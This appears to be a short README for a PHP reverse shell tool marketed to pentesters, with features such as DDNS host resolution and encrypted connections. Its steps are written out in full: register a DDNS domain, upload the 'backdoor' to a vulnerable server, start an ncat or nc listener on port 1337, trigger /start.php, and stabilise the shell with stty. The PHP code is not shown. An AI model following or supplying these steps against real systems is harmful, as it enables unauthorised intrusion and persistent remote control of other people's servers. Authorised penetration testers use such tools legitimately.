Yet another php reverse shell for pentesters
- Compatible with netcat and ncat
- Host resolution via DoH and DDNS
- Support for daemonization and encryption
- Semi-automatic shell stabilization
- Register domain on DDNS service https://freemyip.com
- Save link to update IPv4 address (
https://freemyip.com/update?token=my-token&domain=my-domain.freemyip.com
) - Use link to update IPv4 address
- Change config in
shell.php
file - Upload backdoor to vulnerable server
- Create new terminal window or tab
- Open port from config
- Start listening on port from config:
ncat -nvlp 1337 --ssl
(with encryption, recommend)nc -nlvp 1337
(without encryption)
- Visit
/start.php
on vulnerable server - Wait for shell to appear in terminal
- Press
Ctrl + Z
in terminal - Run
stty raw -echo; fg
in terminal and pressEnter
NOTE: to exit from shell use Ctrl + D
twice